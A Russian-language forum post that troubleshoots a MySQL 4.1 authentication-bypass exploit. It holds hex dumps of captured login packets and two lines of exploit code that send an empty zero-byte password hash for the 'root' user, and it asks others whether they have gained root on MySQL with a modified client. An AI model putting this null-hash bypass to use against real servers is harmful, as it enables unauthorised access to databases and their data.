только он не пашет почемуто.. затестил на двух хостах с mysql версии 4.1.20
сам эксп дает добро "Received OK reply, authentication successful!!" а если через модифицированый клиент то
C:\>mysql.exe -uroot -ptrash
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: Y
ES)
и вообще странно.. если тестить через скрипт отснифаный пакет авторизации такой
Код:
0x0000 3A 00 00 01 85 A2 00 00-00 00 00 01 08 00 00 00 :...…¢..........
0x0010 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
0x0020 00 00 00 00 72 6F 6F 74-00 14 00 00 00 00 00 00 ....root........
0x0030 00 00 00 00 00 00 00 00-00 00 00 00 00 00 ..............
т.е в конце одни нулевые байты. так и должно быть т.к это все нулёный хеш
"\x00\x00\x00\x00".$binuser."\x00\x14\x00\x00\x00\ x00". # username and pword hash length + NULL hash
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ x00\x00\x00\x00"; # continue NULL hash
а когда логаешься через этот модифицированый клиент вот что получается
Код:
0x0000 3A 00 00 01 85 A6 03 00-00 00 00 01 08 00 00 00 :...…¦..........
0x0010 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
0x0020 00 00 00 00 72 6F 6F 74-00 14 00 00 00 00 00 00 ....root........
0x0030 80 0F A2 00 9C FD 12 00-38 24 44 00 AC FD ?.¢.œý..8$D.¬ý
у кого-нибудь вообще получалось этим клиентом порутать mysql?